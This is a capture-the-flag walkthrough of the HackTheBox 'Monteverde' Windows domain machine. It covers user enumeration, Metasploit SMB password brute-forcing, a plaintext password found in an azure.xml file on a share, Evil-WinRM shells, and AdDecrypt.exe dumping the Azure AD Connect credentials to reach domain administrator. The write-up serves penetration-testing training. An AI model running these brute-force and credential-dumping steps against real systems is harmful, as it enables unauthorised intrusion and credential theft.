HTB Monteverde Walkthrough

A technical walk through of hacking the Monteverde box on HackTheBox!

HTB Monteverde Walkthrough

Hello and welcome to another of my HackTheBox walkthroughs, today we are going to hack the Monteverde box on HTB!

Let's jump right in and start with the classical nmap command!

nmap -p 1-65535 -T4 -A -v 10.10.10.172


...and take a look at the interesting result:

PORT      STATE SERVICE       VERSION
53/tcp    open  domain?
| fingerprint-strings: 
|   DNSVersionBindReqTCP: 
|     version
|_    bind
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2020-02-20 18:56:17Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49673/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc         Microsoft Windows RPC
49675/tcp open  msrpc         Microsoft Windows RPC
49706/tcp open  msrpc         Microsoft Windows RPC
49788/tcp open  msrpc         Microsoft Windows RPC


Mmm, many ports here, that could be a good thing, but also a tricky scenario. Too many ports would mean a lot of time dedicated to identifying vulnerabilities. But is too early to talk about that. Good, a Microsoft Windows machine, now we can go to enumerate and start to collect some interesting information.

enum4linux 10.10.10.172


As usual, I report only the interesting aspects of the results.

Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Thu Feb 20 20:01:26 2020

 ========================== 
|    Target Information    |
 ========================== 
Target ........... 10.10.10.172
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
[...]
 ============================= 
|    Users on 10.10.10.172    |
 ============================= 
index: 0xfb6 RID: 0x450 acb: 0x00000210 Account: AAD_987d7f2f57d2	Name: AAD_987d7f2f57d2	Desc: Service account for the Synchronization Service with installation identifier 05c97990-7587-4a3d-b312-309adfc172d9 running on computer MONTEVERDE.
index: 0xfd0 RID: 0xa35 acb: 0x00000210 Account: dgalanos	Name: Dimitris Galanos	Desc: (null)
index: 0xedb RID: 0x1f5 acb: 0x00000215 Account: Guest	Name: (null)	Desc: Built-in account for guest access to the computer/domain
index: 0xfc3 RID: 0x641 acb: 0x00000210 Account: mhope	Name: Mike Hope	Desc: (null)
index: 0xfd1 RID: 0xa36 acb: 0x00000210 Account: roleary	Name: Ray O'Leary	Desc: (null)
index: 0xfc5 RID: 0xa2a acb: 0x00000210 Account: SABatchJobs	Name: SABatchJobs	Desc: (null)
index: 0xfd2 RID: 0xa37 acb: 0x00000210 Account: smorgan	Name: Sally Morgan	Desc: (null)
index: 0xfc6 RID: 0xa2b acb: 0x00000210 Account: svc-ata	Name: svc-ata	Desc: (null)
index: 0xfc7 RID: 0xa2c acb: 0x00000210 Account: svc-bexec	Name: svc-bexec	Desc: (null)
index: 0xfc8 RID: 0xa2d acb: 0x00000210 Account: svc-netapp	Name: svc-netapp	Desc: (null)

user:[Guest] rid:[0x1f5]
user:[AAD_987d7f2f57d2] rid:[0x450]
user:[mhope] rid:[0x641]
user:[SABatchJobs] rid:[0xa2a]
user:[svc-ata] rid:[0xa2b]
user:[svc-bexec] rid:[0xa2c]
user:[svc-netapp] rid:[0xa2d]
user:[dgalanos] rid:[0xa35]
user:[roleary] rid:[0xa36]
user:[smorgan] rid:[0xa37]
[...]
[GROUPS info]
[...]
[+] Getting domain group memberships:
Group 'Trading' (RID: 2610) has member: MEGABANK\dgalanos
Group 'Domain Users' (RID: 513) has member: MEGABANK\Administrator
Group 'Domain Users' (RID: 513) has member: MEGABANK\krbtgt
Group 'Domain Users' (RID: 513) has member: MEGABANK\AAD_987d7f2f57d2
Group 'Domain Users' (RID: 513) has member: MEGABANK\mhope
Group 'Domain Users' (RID: 513) has member: MEGABANK\SABatchJobs
Group 'Domain Users' (RID: 513) has member: MEGABANK\svc-ata
Group 'Domain Users' (RID: 513) has member: MEGABANK\svc-bexec
Group 'Domain Users' (RID: 513) has member: MEGABANK\svc-netapp
Group 'Domain Users' (RID: 513) has member: MEGABANK\dgalanos
Group 'Domain Users' (RID: 513) has member: MEGABANK\roleary
Group 'Domain Users' (RID: 513) has member: MEGABANK\smorgan
Group 'DnsUpdateProxy' (RID: 1102) has member: Could not initialise pipe samr. Error was NT_STATUS_INVALID_NETWORK_RESPONSE
Group 'Domain Guests' (RID: 514) has member: MEGABANK\Guest
Group 'HelpDesk' (RID: 2611) has member: MEGABANK\roleary
Group 'Azure Admins' (RID: 2601) has member: MEGABANK\Administrator
Group 'Azure Admins' (RID: 2601) has member: MEGABANK\AAD_987d7f2f57d2
Group 'Azure Admins' (RID: 2601) has member: MEGABANK\mhope
Group 'Group Policy Creator Owners' (RID: 520) has member: MEGABANK\Administrator
Group 'Operations' (RID: 2609) has member: MEGABANK\smorgan


Well, there's a huge amount of information and many users to use for penetration, so let's go then and prepare a list of users to try brute-forcing on the samba protocol. This is my list, from the outcome of the enumeration:

administrator
guest
krbtgt
domain admins
root
bin
none
AAD_987d7f2f57d2
dgalanos
mhope
roleary
SABatchJobs
smorgan
svc-ata
svc-bexec
svc-netapp


If you read my articles (really? there's someone that reads them?) you will know that I'm usually using the scanner/smb/smb_login on metasploit, then I go on and try to identify some nice credentials. I would like to highlight the attention to the option I chose for this specific scenario, in particular, I set blank_password to true, in order to try also empty password for each user in the list and the user_as_password to true to try the username as the password for the specific user.

msf5 > use auxiliary/scanner/smb/smb_login 
msf5 auxiliary(scanner/smb/smb_login) > options

Module options (auxiliary/scanner/smb/smb_login):

   Name               Current Setting  Required  Description
   ----               ---------------  --------  -----------
   ABORT_ON_LOCKOUT   false            yes       Abort the run when an account lockout is detected
   BLANK_PASSWORDS    false            no        Try blank passwords for all users
   BRUTEFORCE_SPEED   5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS       false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS        false            no        Add all passwords in the current database to the list
   DB_ALL_USERS       false            no        Add all users in the current database to the list
   DETECT_ANY_AUTH    false            no        Enable detection of systems accepting any authentication
   DETECT_ANY_DOMAIN  false            no        Detect if domain is required for the specified user
   PASS_FILE                           no        File containing passwords, one per line
   PRESERVE_DOMAINS   true             no        Respect a username that contains a domain name.
   Proxies                             no        A proxy chain of format type:host:port[,type:host:port][...]
   RECORD_GUEST       false            no        Record guest-privileged random logins to the database
   RHOSTS                              yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT              445              yes       The SMB service port (TCP)
   SMBDomain          .                no        The Windows domain to use for authentication
   SMBPass                             no        The password for the specified username
   SMBUser                             no        The username to authenticate as
   STOP_ON_SUCCESS    false            yes       Stop guessing when a credential works for a host
   THREADS            1                yes       The number of concurrent threads (max one per host)
   USERPASS_FILE                       no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS       false            no        Try the username as the password for all users
   USER_FILE                           no        File containing usernames, one per line
   VERBOSE            true             yes       Whether to print output for all attempts

msf5 auxiliary(scanner/smb/smb_login) > set blank_passwords true
blank_passwords => true
msf5 auxiliary(scanner/smb/smb_login) > set detect_any_domain true
detect_any_domain => true
msf5 auxiliary(scanner/smb/smb_login) > set rhosts 10.10.10.172
rhosts => 10.10.10.172
msf5 auxiliary(scanner/smb/smb_login) > set user_as_pass true
user_as_pass => true
msf5 auxiliary(scanner/smb/smb_login) > set user_file user-list.txt
user_file => user-list.txt
msf5 auxiliary(scanner/smb/smb_login) > set pass_file /opt/Teeth/static/wp-password-list.txt
pass_file => /opt/Teeth/static/wp-password-list.txt
msf5 auxiliary(scanner/smb/smb_login) > exploit

[*] 10.10.10.172:445      - 10.10.10.172:445 - Starting SMB login bruteforce
[-] 10.10.10.172:445      - 10.10.10.172:445 - Failed: '.\administrator:administrator',
[...]
[-] 10.10.10.172:445      - 10.10.10.172:445 - Failed: '.\administrator:changeme',
[-] 10.10.10.172:445      - 10.10.10.172:445 - Failed: '.\guest:guest',
[*] 10.10.10.172:445      - 10.10.10.172:445 - Correct credentials, but unable to login: '.\guest:',
[-] 10.10.10.172:445      - 10.10.10.172:445 - Failed: '.\guest:admin',
[-] 10.10.10.172:445      - 10.10.10.172:445 - Failed: '.\guest:password1',
[...]
[-] 10.10.10.172:445      - 10.10.10.172:445 - Failed: '.\roleary:site',
[-] 10.10.10.172:445      - 10.10.10.172:445 - Failed: '.\roleary:changeme',
[+] 10.10.10.172:445      - 10.10.10.172:445 - Success: '.\SABatchJobs:SABatchJobs'
[*] 10.10.10.172:445      - 10.10.10.172:445 - Domain is ignored for user SABatchJobs
[-] 10.10.10.172:445      - 10.10.10.172:445 - Failed: '.\smorgan:smorgan',
[-] 10.10.10.172:445      - 10.10.10.172:445 - Failed: '.\smorgan:',
[...]


As you can see by the output, that was exactly the second parameter that identified a valid user, what I want to explain, is: don't avoid something simple to save time, sometimes it could be the key to the secret door.

Good, we have a credential now, lets start to identify what we can do with it through the samba client.

in7rud3r@kali:~$ smbclient -U MEGABANK\\SABatchJobs -L 10.10.10.172
Enter MEGABANK\SABatchJobs's password: 

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        azure_uploads   Disk      
        C$              Disk      Default share
        E$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        SYSVOL          Disk      Logon server share 
        users$          Disk      
SMB1 disabled -- no workgroup available


Ok, something interesting here, hope we have access to at least one of these shares.

I navigate for hours looking for something interesting, I find it in the end...

in7rud3r@kali:~$ smbclient -U MEGABANK\\SABatchJobs //10.10.10.172/users$
Enter MEGABANK\SABatchJobs's password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                              D        0  Fri Jan  3 14:12:48 2020
  ..                             D        0  Fri Jan  3 14:12:48 2020
  dgalanos                       D        0  Fri Jan  3 14:12:30 2020
  mhope                          D        0  Fri Jan  3 14:41:18 2020
  roleary                        D        0  Fri Jan  3 14:10:30 2020
  smorgan                        D        0  Fri Jan  3 14:10:24 2020

                524031 blocks of size 4096. 519955 blocks available
smb: \> cd dgalanos\
smb: \dgalanos\> ls
  .                              D        0  Fri Jan  3 14:12:30 2020
  ..                             D        0  Fri Jan  3 14:12:30 2020

                524031 blocks of size 4096. 519955 blocks available
smb: \dgalanos\> cd ..
smb: \> cd mhope\
smb: \mhope\> ls
  .                              D        0  Fri Jan  3 14:41:18 2020
  ..                             D        0  Fri Jan  3 14:41:18 2020
  azure.xml                     AR     1212  Fri Jan  3 14:40:23 2020

                524031 blocks of size 4096. 519955 blocks available
smb: \mhope\> get azure.xml 
getting file \mhope\azure.xml of size 1212 as azure.xml (1.4 KiloBytes/sec) (average 1.4 KiloBytes/sec)
smb: \mhope\> cd ..
smb: \> cd roleary\
smb: \roleary\> ls
  .                              D        0  Fri Jan  3 14:10:30 2020
  ..                             D        0  Fri Jan  3 14:10:30 2020

                524031 blocks of size 4096. 519955 blocks available
smb: \roleary\> cd ..
smb: \> cd smorgan\
smb: \smorgan\> ls
  .                              D        0  Fri Jan  3 14:10:24 2020
  ..                             D        0  Fri Jan  3 14:10:24 2020

                524031 blocks of size 4096. 519955 blocks available
smb: \smorgan\> cd ..
smb: \> exit

As you can see, I download an xml file about azure and when I go to check what inside, I found this:

Great, we could have another password, probably for the mhope user, but, as said before, don't leave anything to chance. So, back to our brute-forcing and this time try only this single password for all the user list create before, will be fast this time and you will be sure that this password will work only for one of them. So, the output will confirm what I already know.

[*] Auxiliary module running as background job 1.
[*] 10.10.10.172:445      - 10.10.10.172:445 - Starting SMB login bruteforce
[-] 10.10.10.172:445      - 10.10.10.172:445 - Failed: '.\administrator:4n0therD4y@n0th3r$',
[-] 10.10.10.172:445      - 10.10.10.172:445 - Failed: '.\guest:4n0therD4y@n0th3r$',
[-] 10.10.10.172:445      - 10.10.10.172:445 - Failed: '.\krbtgt:4n0therD4y@n0th3r$',
[-] 10.10.10.172:445      - 10.10.10.172:445 - Failed: '.\domain admins:4n0therD4y@n0th3r$',
[-] 10.10.10.172:445      - 10.10.10.172:445 - Failed: '.\root:4n0therD4y@n0th3r$',
[-] 10.10.10.172:445      - 10.10.10.172:445 - Failed: '.\bin:4n0therD4y@n0th3r$',
[-] 10.10.10.172:445      - 10.10.10.172:445 - Failed: '.\none:4n0therD4y@n0th3r$',
[-] 10.10.10.172:445      - 10.10.10.172:445 - Failed: '.\AAD_987d7f2f57d2:4n0therD4y@n0th3r$',
[-] 10.10.10.172:445      - 10.10.10.172:445 - Failed: '.\dgalanos:4n0therD4y@n0th3r$',
[+] 10.10.10.172:445      - 10.10.10.172:445 - Success: '.\mhope:4n0therD4y@n0th3r$'
[-] 10.10.10.172:445      - 10.10.10.172:445 - Failed: '.\roleary:4n0therD4y@n0th3r$',
[-] 10.10.10.172:445      - 10.10.10.172:445 - Failed: '.\SABatchJobs:4n0therD4y@n0th3r$',
[-] 10.10.10.172:445      - 10.10.10.172:445 - Failed: '.\smorgan:4n0therD4y@n0th3r$',
[-] 10.10.10.172:445      - 10.10.10.172:445 - Failed: '.\svc-ata:4n0therD4y@n0th3r$',
[-] 10.10.10.172:445      - 10.10.10.172:445 - Failed: '.\svc-bexec:4n0therD4y@n0th3r$',
[-] 10.10.10.172:445      - 10.10.10.172:445 - Failed: '.\svc-netapp:4n0therD4y@n0th3r$',
[*] 10.10.10.172:445      - Scanned 1 of 1 hosts (100% complete)

We are near to find the first flag, anyway, as yet done in some other article I wrote, the best reverse shell for windows is "Evil-WinRm" and yet said in a previous article, I prefer the docker version for this specific... "tool" :P

So, I haven't the docker service started to don't load my little machine, if you are in my same situation, remember to start docker service before launch the specific docker instance: service start docker. And now...

in7rud3r@kali:/root/Desktop/hackthebox/_Monteverde - 10.10.10.172/attack$ sudo docker run --rm -ti --name evil-winrm -v /home/foo/ps1_scripts:/ps1_scripts -v /home/foo/exe_files:/exe_files -v /home/foo/data:/data oscarakaelvis/evil-winrm -i 10.10.10.172 -u MEGABANK\\mhope -p '4n0therD4y@n0th3r$' -s '/ps1_scripts/' -e '/exe_files/'

Evil-WinRM shell v2.1

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\mhope\Documents> cd ..
*Evil-WinRM* PS C:\Users\mhope> cd Desktop
*Evil-WinRM* PS C:\Users\mhope\Desktop> dir


    Directory: C:\Users\mhope\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---         1/3/2020   5:48 AM             32 user.txt


*Evil-WinRM* PS C:\Users\mhope\Desktop> more user.txt
4******************************2

...we capture the first flag.

Gooooooood. Ok, let's go to the root.

First of all, I'd like to understand what can I do with this user, then, the whoami command can help me.

*Evil-WinRM* PS C:\program Files\Microsoft Azure AD Sync\Bin> whoami -all

USER INFORMATION
----------------

User Name      SID
============== ============================================
megabank\mhope S-1-5-21-391775091-850290835-3566037492-1601


GROUP INFORMATION
-----------------

Group Name                                  Type             SID                                          Attributes
=========================================== ================ ============================================ ==================================================
Everyone                                    Well-known group S-1-1-0                                      Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users             Alias            S-1-5-32-580                                 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                               Alias            S-1-5-32-545                                 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access  Alias            S-1-5-32-554                                 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                        Well-known group S-1-5-2                                      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users            Well-known group S-1-5-11                                     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization              Well-known group S-1-5-15                                     Mandatory group, Enabled by default, Enabled group
MEGABANK\Azure Admins                       Group            S-1-5-21-391775091-850290835-3566037492-2601 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication            Well-known group S-1-5-64-10                                  Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label            S-1-16-8448


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled


USER CLAIMS INFORMATION
-----------------------

User claims unknown.

Kerberos support for Dynamic Access Control on this device has been disabled.


Ok, it seems that this user is an Azure Admin and that they have some interesting privileges capability, in particular, "Add workstation to domain" means that we have access to the "Active Directory", probably as administrator and we know that on the active directory there's also users information. I don't have a lot of experience with the Azure system (I worked in the past on Azure, but I configured services on the cloud), so I chose to give a fast search on google. My search was "exploit AD via azure" and I was very happy when I see that the first result was right for me. I link here the page so you can read and study this exploit: https://vbscrub.video.blog/2020/01/14/azure-ad-connect-database-exploit-priv-esc/

Ok, fantastic, if it works we complete this machine, let's go! Come back to the open shell and proceed. In the article you can read that need only two files, that you can download directly from the page, so download it and extract in the folder that we have configured to exchange data with the docker container, in my case /home/foo/data/ (that coincides with the /data folder on the docker container). I extract in /home/foo/data/to-upload/ folder. You have to read all the article with attention because in a specific step the author says that:

This program must be run while the AD Sync Bin folder is your “working directory”, or has been added to the PATH variable. An easy way to do this is simply navigate to the folder in Powershell or Command Prompt (i.e cd “C:\Program Files\Microsoft Azure AD Sync\Bin”),  and then run the program by typing the full path to wherever you have  stored it. You also need to make sure the mcrypt.dll from the download  link is in the same directory the program is in. Failure to do either of  these things will result in a Module Not Found error.

So I decide to download into the Documents folder of the mhope user and proceed.

*Evil-WinRM* PS C:\Users\mhope\Documents> upload /data/to-upload/AdDecrypt.exe

Warning: Remember that in docker environment all local paths should be at /data and it must be mapped correctly as a volume on docker run command

Info: Uploading /data/to-upload/AdDecrypt.exe to C:\Users\mhope\Documents\AdDecrypt.exe

Data: 19796 bytes of 19796 bytes copied

Info: Upload successful!

*Evil-WinRM* PS C:\Users\mhope\Documents> upload /data/to-upload/mcrypt.dll   

Warning: Remember that in docker environment all local paths should be at /data and it must be mapped correctly as a volume on docker run command

Info: Uploading /data/to-upload/mcrypt.dll to C:\Users\mhope\Documents\mcrypt.dll

Data: 445664 bytes of 445664 bytes copied

Info: Upload successful!

*Evil-WinRM* PS C:\Users\mhope\Documents> dir


    Directory: C:\Users\mhope\Documents


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         3/1/2020   6:51 AM          14848 AdDecrypt.exe
-a----         3/1/2020   6:51 AM         334248 mcrypt.dll


Great, we have only to cross our fingers and hope that it all worka correctly. I move on the Bin folder mentioned and try to launch.

*Evil-WinRM* PS C:\program Files\Microsoft Azure AD Sync\Bin> \users\mhope\documents\AdDecrypt.exe

======================
AZURE AD SYNC CREDENTIAL DECRYPTION TOOL
Based on original code from: https://github.com/fox-it/adconnectdump
======================

Opening database connection...
Error reading from database: A network-related or instance-specific error occurred while establishing a connection to SQL Server. The server was not found or was not accessible. Verify that the instance name is correct and that SQL Server is configured to allow remote connections. (provider: SQL Network Interfaces, error: 52 - Unable to locate a Local Database Runtime installation. Verify that SQL Server Express is properly installed and that the Local Database Runtime feature is enabled.)
Closing database connection...


Ok, there's something wrong, repeat... read all the article... so now I know that:

AdDecrypt.exe (with no parameters)

Will attempt to access the ADSync database on the default SQLExpress “LocalDb” instance

AdDecrypt.exe -FullSQL

Will attempt to access the ADSync database on a full fat MS SQL  instance using windows authentication (the actual connection string used  is: “Server=LocalHost;Database=ADSync;Trusted_Connection=True;” )

I know, this clue is immediately before the previous part of the article... I'm saying to you to read... I'm incorrigible :D

Ok, try again and...

*Evil-WinRM* PS C:\program Files\Microsoft Azure AD Sync\Bin> \users\mhope\documents\AdDecrypt.exe -FullSQL

======================
AZURE AD SYNC CREDENTIAL DECRYPTION TOOL
Based on original code from: https://github.com/fox-it/adconnectdump
======================

Opening database connection...
Executing SQL commands...
Closing database connection...
Decrypting XML...
Parsing XML...
Finished!

DECRYPTED CREDENTIALS:
Username: administrator
Password: d0m@in4dminyeah!
Domain: MEGABANK.LOCAL

...bingooooooo!

Well, really simple now, stop your docker container, modify the credentials and start again.

in7rud3r@kali:/root/Desktop/hackthebox/_Monteverde - 10.10.10.172/attack$ sudo docker run --rm -ti --name evil-winrm -v /home/foo/ps1_scripts:/ps1_scripts -v /home/foo/exe_files:/exe_files -v /home/foo/data:/data oscarakaelvis/evil-winrm -i 10.10.10.172 -u MEGABANK\\administrator -p 'd0m@in4dminyeah!' -s '/ps1_scripts/' -e '/exe_files/'
[sudo] password for in7rud3r: 

Evil-WinRM shell v2.1

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> dir


    Directory: C:\Users\Administrator\Documents


Mode                LastWriteTime Length Name
----                ------------- ------ ----
d-----         1/2/2020   3:06 PM        SQL Server Management Studio
d-----         1/2/2020   3:10 PM        Visual Studio 2017
d-----         1/3/2020   5:28 AM        WindowsPowerShell


*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\Administrator> cd Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir


    Directory: C:\Users\Administrator\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---         1/3/2020   5:48 AM             32 root.txt


*Evil-WinRM* PS C:\Users\Administrator\Desktop> more root.txt
1******************************c


Thanks for reading and happy hacking!

The awesome image used in this article is called Puking Warlock and was created by Fabricio Rosa Marques.